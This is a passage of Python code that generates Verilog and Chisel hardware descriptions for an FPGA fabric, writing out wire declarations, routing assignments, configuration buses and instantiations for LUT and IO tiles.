line_to_print = ' io_tile_0_' + str(x_cor) + '.io.configs_in := io.configs_in(' + str(32*x_cor + 31) + ', ' + str(32*x_cor) + ')\n'
fpga_tile_fp.write(line_to_print)
# CENTER
for y_cor in range (1, y_size + 1):
for x_cor in range (0, x_size + 2):
if x_cor == 0 or x_cor == x_size + 1:
line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_in := io.configs_in(' + str(32*x_cor + 31) + ', ' + str(32*x_cor) + ')\n'
fpga_tile_fp.write(line_to_print)
else:
line_to_print = ' lut_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_in := io.configs_in(' + str(32*x_cor + 31) + ', ' + str(32*x_cor) + ')\n'
fpga_tile_fp.write(line_to_print)
# EDGE
for x_cor in range (1, x_size + 1):
line_to_print = ' io_tile_' + str(y_size + 1) + '_' + str(x_cor) + '.io.configs_in := io.configs_in(' + str(32*x_cor + 31) + ', ' + str(32*x_cor) + ')\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_lut_tile_ipin (fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count):
fpga_tile_fp.write('\n\n // LUT TILE IPIN\n')
for x_cor in range (1, x_size + 1):
for y_cor in range (1, y_size + 1):
this_tile = fpga_lut_tile[y_cor-1][x_cor-1]
ipin_count = 0
line_to_print = ' assign lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_ipin_in = {'
for i in range (this_tile.num_ipin - 1, -1, -1):
for j in range (len(fpga_route[this_tile.ipin_list[i]].sup_r) - 1, -1, -1):
line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.ipin_list[i]].sup_r[j])
ipin_count = ipin_count + 1
if i != 0 or j != 0:
line_to_print = line_to_print + ', '
line_to_print = line_to_print + '};\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' // IPIN TOTAL: ' + str(ipin_count) + '\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_lut_tile_opin (fpga_tile_fp, fpga_lut_tile, x_size, y_size):
fpga_tile_fp.write('\n\n // FPGA TILE OPIN\n')
for y_cor in range (1, y_size + 1):
for x_cor in range (1, x_size + 1):
this_tile = fpga_lut_tile[y_cor-1][x_cor-1]
for i in range (0, len(this_tile.opin_list)):
opin_id = this_tile.opin_list[i]
line_to_print = ' assign wire_' + str(opin_id) + ' = '
line_to_print = line_to_print + 'lut_tile_' + str(y_cor) + '_' + str(x_cor) + '_opin_out[' + str(i) + '];\n'
fpga_tile_fp.write(line_to_print)
def generate_lut_tile_opin (fpga_tile_fp, fpga_lut_tile, x_size, y_size):
fpga_tile_fp.write('\n\n // FPGA TILE OPIN\n')
for y_cor in range (1, y_size + 1):
for x_cor in range (1, x_size + 1):
this_tile = fpga_lut_tile[y_cor-1][x_cor-1]
for i in range (0, len(this_tile.opin_list)):
opin_id = this_tile.opin_list[i]
line_to_print = ' wire_' + str(opin_id) + ' := '
line_to_print = line_to_print + 'lut_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.opin_out(' + str(i) + ')\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_lut_tile_chanxy (fpga_tile_fp, fpga_lut_tile, fpga_route, x_size, y_size, const_node_count):
fpga_tile_fp.write(' // LUT TILE CHANXY \n')
for y_cor in range (1, y_size + 1):
for x_cor in range (1, x_size + 1):
this_tile = fpga_lut_tile[y_cor-1][x_cor-1]
chanxy_out_count = 0
line_to_print = ' assign lut_tile_' + str(y_cor) + '_' + str(x_cor) + '_chanxy_in = {'
for i in range (len(this_tile.chanxy_out_list) - 1, -1, -1):
for j in range (len(fpga_route[this_tile.chanxy_out_list[i]].sup_r) - 1, -1, -1):
line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.chanxy_out_list[i]].sup_r[j])
chanxy_out_count = chanxy_out_count + 1
if i != 0 or j != 0:
line_to_print = line_to_print + ', '
line_to_print = line_to_print + '};\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' // CHNAXY TOTAL: ' + str(chanxy_out_count) + '\n'
fpga_tile_fp.write(line_to_print)
for i in range (0, len(this_tile.chanxy_out_list)):
line_to_print = ' assign wire_' + str(this_tile.chanxy_out_list[i]) + ' = lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_chanxy_out[' + str(i) + '];\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' // CHANXY OUT\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_io_tile_chanxy (fpga_tile_fp, fpga_io_tile, fpga_route):
fpga_tile_fp.write(' // FPGA IO CHANXY\n')
for this_tile in fpga_io_tile:
if this_tile.num_chanxy_out != 0:
chanxy_out_count = 0
line_to_print = ' assign io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_chanxy_in = {'
for i in range (len(this_tile.chanxy_out_list) - 1, -1, -1):
chanxy_out_count = chanxy_out_count + 1
for j in range (len(fpga_route[this_tile.chanxy_out_list[i]].sup_r) - 1, -1, -1):
line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.chanxy_out_list[i]].sup_r[j])
if i != 0 or j != 0:
line_to_print = line_to_print + ', '
line_to_print = line_to_print + '};\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' // CHNAXY TOTAL: ' + str(chanxy_out_count) + '\n'
fpga_tile_fp.write(line_to_print)
for i in range (0, len(this_tile.chanxy_out_list)):
line_to_print = ' assign wire_' + str(this_tile.chanxy_out_list[i]) + ' = io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_chanxy_out[' + str(i) + '];\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_io_tile_ipin (fpga_tile_fp, fpga_io_tile, fpga_route):
fpga_tile_fp.write(' // FPGA IO IPIN\n')
for this_tile in fpga_io_tile:
line_to_print = ' assign io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_ipin_in = {'
for i in range (this_tile.num_ipin - 1, -1, -1):
for j in range (len(fpga_route[this_tile.ipin_list[i]].sup_r) - 1, -1, -1):
line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.ipin_list[i]].sup_r[j])
if i != 0 or j != 0:
line_to_print = line_to_print + ', '
line_to_print = line_to_print + '};\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' // FPGA IPIN IN\n'
fpga_tile_fp.write(line_to_print)
def generate_io_tile_ipin (fpga_tile_fp, fpga_io_tile, fpga_route):
fpga_tile_fp.write(' // FPGA IO IPIN\n')
for this_tile in fpga_io_tile:
line_to_print = ' io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '.io.ipin_in := Cat('
for i in range (0, this_tile.num_ipin):
for j in range (0, len(fpga_route[this_tile.ipin_list[i]].sup_r)):
line_to_print = line_to_print + 'wire_' + str(fpga_route[this_tile.ipin_list[i]].sup_r[j])
if i != (len(this_tile.ipin_list) - 1) or j != (len(fpga_route[this_tile.ipin_list[i]].sup_r) - 1):
line_to_print = line_to_print + ', '
line_to_print = line_to_print + ')\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' // FPGA IPIN IN\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_io_tile_opin (fpga_tile_fp, fpga_io_tile):
fpga_tile_fp.write('\n\n // FPGA IO OPIN\n')
for this_tile in fpga_io_tile:
for i in range (0, len(this_tile.opin_list)):
opin_id = this_tile.opin_list[i]
line_to_print = ' assign wire_' + str(opin_id) + ' = '
line_to_print = line_to_print + 'io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '_opin_out[' + str(i) + '];\n'
fpga_tile_fp.write(line_to_print)
def generate_io_tile_opin (fpga_tile_fp, fpga_io_tile):
fpga_tile_fp.write('\n\n // FPGA IO OPIN\n')
for this_tile in fpga_io_tile:
for i in range (0, len(this_tile.opin_list)):
opin_id = this_tile.opin_list[i]
line_to_print = ' wire_' + str(opin_id) + ' := '
line_to_print = line_to_print + 'io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor) + '.io.opin_out(' + str(i) + ');\n'
fpga_tile_fp.write(line_to_print)
def generate_fpga_tile_ff_en (fpga_tile_fp, x_size, y_size):
fpga_tile_fp.write('\n\n // FPGA TILE FF_EN\n')
for y_cor in range (1, y_size + 1):
for x_cor in range (1, x_size + 1):
line_to_print = ' lut_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.ff_en := io.ff_en\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_fpga_tile_declare(fpga_tile_fp, fpga_lut_tile, fpga_io_tile, x_size, y_size, fpga_config_depth, fpga_config_start_index):
line_to_print = '\n\n // FPGA IO TILES DECLARE\n'
fpga_tile_fp.write(line_to_print)
for i in range (0, len(fpga_io_tile)):
this_tile = fpga_io_tile[i]
tile_name = 'io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
if this_tile.num_chanxy_out != 0:
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin_in - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' io_tile_sp_' + str(i) + ' ' + tile_name + '(\n'
if this_tile.num_chanxy_out != 0:
line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
# different sides on IOs
if this_tile.y_cor == y_size + 1:
i_end_index = this_tile.x_cor*this_tile.num_ipin - 1
i_start_index = i_end_index - this_tile.num_ipin + 1
o_end_index = this_tile.x_cor*this_tile.num_opin - 1
o_start_index = o_end_index - this_tile.num_opin + 1
line_to_print = line_to_print + ' .io_io_input(top_in[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_io_output(top_out[' + str(o_end_index) + ':' + str(o_start_index) + ']),\n'
if this_tile.y_cor == 0:
i_end_index = this_tile.x_cor*this_tile.num_ipin - 1
i_start_index = i_end_index - this_tile.num_ipin + 1
o_end_index = this_tile.x_cor*this_tile.num_opin - 1
o_start_index = o_end_index - this_tile.num_opin + 1
line_to_print = line_to_print + ' .io_io_input(bot_in[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_io_output(bot_out[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
if this_tile.x_cor == 0:
i_end_index = this_tile.y_cor*this_tile.num_ipin - 1
i_start_index = i_end_index - this_tile.num_ipin + 1
o_end_index = this_tile.y_cor*this_tile.num_opin - 1
o_start_index = o_end_index - this_tile.num_opin + 1
line_to_print = line_to_print + ' .io_io_input(left_in[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_io_output(left_out[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
if this_tile.x_cor == x_size + 1:
i_end_index = this_tile.y_cor*this_tile.num_ipin - 1
i_start_index = i_end_index - this_tile.num_ipin + 1
o_end_index = this_tile.y_cor*this_tile.num_opin - 1
o_start_index = o_end_index - this_tile.num_opin + 1
line_to_print = line_to_print + ' .io_io_input(right_in[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_io_output(right_out[' + str(i_end_index) + ':' + str(i_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_x_loc(),\n'
line_to_print = line_to_print + ' .io_y_loc(),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
line_to_print = '\n\n // FPGA LUT TILES DECLARE\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = 0
for y_cor in range (0, y_size):
x_cor = 0
this_tile = fpga_lut_tile[y_cor][x_cor]
tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' lut_tile_sp_' + str(edge_param_count) + ' ' + tile_name + '(\n'
line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_x_loc(),\n'
line_to_print = line_to_print + ' .io_y_loc(),\n'
line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = edge_param_count + 1
for y_cor in range (0, y_size):
x_cor = x_size - 1
this_tile = fpga_lut_tile[y_cor][x_cor]
tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' lut_tile_sp_' + str(edge_param_count) + ' ' + tile_name + '(\n'
line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_x_loc(),\n'
line_to_print = line_to_print + ' .io_y_loc(),\n'
line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = edge_param_count + 1
for x_cor in range (1, x_size - 1):
y_cor = 0
this_tile = fpga_lut_tile[y_cor][x_cor]
tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' lut_tile_sp_' + str(edge_param_count) + ' ' + tile_name + '(\n'
line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_x_loc(),\n'
line_to_print = line_to_print + ' .io_y_loc(),\n'
line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = edge_param_count + 1
for x_cor in range (1, x_size - 1):
y_cor = y_size -1
this_tile = fpga_lut_tile[y_cor][x_cor]
tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' lut_tile_sp_' + str(edge_param_count) + ' ' + tile_name + '(\n'
line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_x_loc(),\n'
line_to_print = line_to_print + ' .io_y_loc(),\n'
line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = edge_param_count + 1
# center of lut tile
for y_cor in range (1, y_size - 1):
for x_cor in range (1, x_size - 1):
this_tile = fpga_lut_tile[y_cor][x_cor]
tile_name = 'lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
this_tile_config_depth = fpga_config_depth[this_tile.y_cor][this_tile.x_cor]
this_tile_config_start_index = fpga_config_start_index[this_tile.y_cor]
this_tile_config_in_range_high = 32*(this_tile.x_cor+1) - 1
this_tile_config_in_range_low = 32*this_tile.x_cor
line_to_print = ''
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_in - 1) + ':0] ' + tile_name + '_chanxy_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_chanxy_out - 1) + ':0] ' + tile_name + '_chanxy_out;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_ipin*this_tile.ipin_input_width_list[0] - 1) + ':0] ' + tile_name + '_ipin_in;\n'
line_to_print = line_to_print + ' wire [' + str(this_tile.num_opin - 1) + ':0] ' + tile_name + '_opin_out;\n'
fpga_tile_fp.write(line_to_print)
line_to_print = ' lut_tile' + ' ' + tile_name + '(\n'
line_to_print = line_to_print + ' .io_chanxy_in(' + tile_name + '_chanxy_in),\n'
line_to_print = line_to_print + ' .io_chanxy_out(' + tile_name + '_chanxy_out),\n'
line_to_print = line_to_print + ' .io_configs_in(configs_in[' + str(this_tile_config_in_range_high) + ':' + str(this_tile_config_in_range_low) + ']),\n'
line_to_print = line_to_print + ' .io_configs_en(configs_en[' + str(this_tile_config_start_index+this_tile_config_depth-1) + ':' + str(this_tile_config_start_index) + ']),\n'
line_to_print = line_to_print + ' .io_ipin_in(' + tile_name + '_ipin_in),\n'
line_to_print = line_to_print + ' .io_opin_out(' + tile_name + '_opin_out),\n'
line_to_print = line_to_print + ' .io_ff_en(ff_en),\n'
line_to_print = line_to_print + ' .clk(clock),\n'
line_to_print = line_to_print + ' .reset(rst)\n'
line_to_print = line_to_print + ' );\n\n'
fpga_tile_fp.write(line_to_print)
def generate_fpga_tile_declare (fpga_tile_fp, fpga_lut_tile, fpga_io_tile, x_size, y_size):
line_to_print = '\n\n // FPGA IO TILES DECLARE\n'
fpga_tile_fp.write(line_to_print)
for i in range (0, len(fpga_io_tile)):
this_tile = fpga_io_tile[i]
line_to_print = ' val io_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
if this_tile.num_chanxy_out == 0:
line_to_print = line_to_print + ' = new io_tile_wo_chanxy (io_tile_param_list(' + str(i) + '))\n'
else:
line_to_print = line_to_print + ' = new io_tile (io_tile_param_list(' + str(i) + '))\n'
fpga_tile_fp.write(line_to_print)
edge_param_count = 0
line_to_print = '\n\n // FPGA LUT TILES DECLARE\n'
fpga_tile_fp.write(line_to_print)
for y_cor in range (0, y_size):
x_cor = 0
this_tile = fpga_lut_tile[y_cor][x_cor]
line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
line_to_print = line_to_print + ' = new lut_tile_gen (lut_tile_param_list(' + str(edge_param_count) + '))\n'
edge_param_count = edge_param_count + 1
fpga_tile_fp.write(line_to_print)
for y_cor in range (0, y_size):
x_cor = x_size - 1
this_tile = fpga_lut_tile[y_cor][x_cor]
line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
line_to_print = line_to_print + ' = new lut_tile_gen (lut_tile_param_list(' + str(edge_param_count) + '))\n'
edge_param_count = edge_param_count + 1
fpga_tile_fp.write(line_to_print)
for x_cor in range (1, x_size - 1):
y_cor = 0
this_tile = fpga_lut_tile[y_cor][x_cor]
line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
line_to_print = line_to_print + ' = new lut_tile_gen (lut_tile_param_list(' + str(edge_param_count) + '))\n'
edge_param_count = edge_param_count + 1
fpga_tile_fp.write(line_to_print)
for x_cor in range (1, x_size - 1):
y_cor = y_size -1
this_tile = fpga_lut_tile[y_cor][x_cor]
line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
line_to_print = line_to_print + ' = new lut_tile_gen (lut_tile_param_list(' + str(edge_param_count) + '))\n'
edge_param_count = edge_param_count + 1
fpga_tile_fp.write(line_to_print)
# center of lut tile
for y_cor in range (1, y_size - 1):
for x_cor in range (1, x_size - 1):
this_tile = fpga_lut_tile[y_cor][x_cor]
line_to_print = ' val lut_tile_' + str(this_tile.y_cor) + '_' + str(this_tile.x_cor)
line_to_print = line_to_print + ' = new lut_tile\n'
fpga_tile_fp.write(line_to_print)
def generate_fpga_io_conn(fpga_tile_fp, fpga_io_tile, x_size, y_size):
_per_io_in = fpga_io_tile[0].num_opin
_per_io_out = fpga_io_tile[0].num_ipin
line_to_print = '\n\n // IO CONN\n'
fpga_tile_fp.write(line_to_print)
# top
out_line_to_print = ' io.top_out:= ' + 'Cat('
y_cor = y_size + 1
for x_cor in range (1, x_size + 1):
tile_name = 'io_tile_' + str(y_cor) + '_' + str(x_cor)
out_line_to_print = out_line_to_print + ' ' + tile_name + '.io.io_io_output,'
line_to_print = ' ' + tile_name + '.io.io_io_input := ' + 'io.top_in(' + str(x_cor*_per_io_out - 1) + ', ' + str((x_cor-1)*_per_io_out) + ')\n'
fpga_tile_fp.write(line_to_print)
out_line_to_print = out_line_to_print[0:len(out_line_to_print)-1] + ')\n'
fpga_tile_fp.write(out_line_to_print)
# bot
out_line_to_print = ' io.bot_out:= ' + 'Cat('
y_cor = 0
for x_cor in range (1, x_size + 1):
tile_name = 'io_tile_' + str(y_cor) + '_' + str(x_cor)
out_line_to_print = out_line_to_print + ' ' + tile_name + '.io.io_io_output,'
line_to_print = ' ' + tile_name + '.io.io_io_input := ' + 'io.bot_in(' + str(x_cor*_per_io_out - 1) + ', ' + str((x_cor-1)*_per_io_out) + ')\n'
fpga_tile_fp.write(line_to_print)
out_line_to_print = out_line_to_print[0:len(out_line_to_print)-1] + ')\n'
fpga_tile_fp.write(out_line_to_print)
# left
out_line_to_print = ' io.left_out:= ' + 'Cat('
x_cor = 0
for y_cor in range (1, y_size + 1):
tile_name = 'io_tile_' + str(y_cor) + '_' + str(x_cor)
out_line_to_print = out_line_to_print + ' ' + tile_name + '.io.io_io_output,'
line_to_print = ' ' + tile_name + '.io.io_io_input := ' + 'io.left_in(' + str(y_cor*_per_io_out - 1) + ', ' + str((y_cor-1)*_per_io_out) + ')\n'
fpga_tile_fp.write(line_to_print)
out_line_to_print = out_line_to_print[0:len(out_line_to_print)-1] + ')\n'
fpga_tile_fp.write(out_line_to_print)
# right
out_line_to_print = ' io.right_out:= ' + 'Cat('
x_cor = x_size + 1
for y_cor in range (1, y_size + 1):
tile_name = 'io_tile_' + str(y_cor) + '_' + str(x_cor)
out_line_to_print = out_line_to_print + ' ' + tile_name + '.io.io_io_output,'
line_to_print = ' ' + tile_name + '.io.io_io_input := ' + 'io.right_in(' + str(y_cor*_per_io_out - 1) + ', ' + str((y_cor-1)*_per_io_out) + ')\n'
fpga_tile_fp.write(line_to_print)
out_line_to_print = out_line_to_print[0:len(out_line_to_print)-1] + ')\n'
fpga_tile_fp.write(out_line_to_print)
line_to_print = '\n\n'
fpga_tile_fp.write(line_to_print)
def generate_tile_configs_en (fpga_tile_fp, fpga_config_depth, fpga_config_start_index, x_size, y_size):
line_to_print = '\n\n // FPGA CONFIG EN\n'
fpga_tile_fp.write(line_to_print)
# Edge
for y_cor in range (1, y_size + 1):
x_cor = 0
_start_index = fpga_config_start_index[y_cor]
_end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
fpga_tile_fp.write(line_to_print)
for y_cor in range (1, y_size + 1):
x_cor = x_size + 1
_start_index = fpga_config_start_index[y_cor]
_end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
line_to_print = ' io_tile_' + str(y_cor) + '_' + str(x_cor) + '.io.configs_en := io.configs_en(' + str(_end_index) + ', ' + str(_start_index) + ')\n'
fpga_tile_fp.write(line_to_print)
for x_cor in range (1, x_size + 1):
y_cor = 0
_start_index = fpga_config_start_index[y_cor]
_end_index = fpga_config_start_index[y_cor] + fpga_config_depth[y_cor][x_cor] - 1
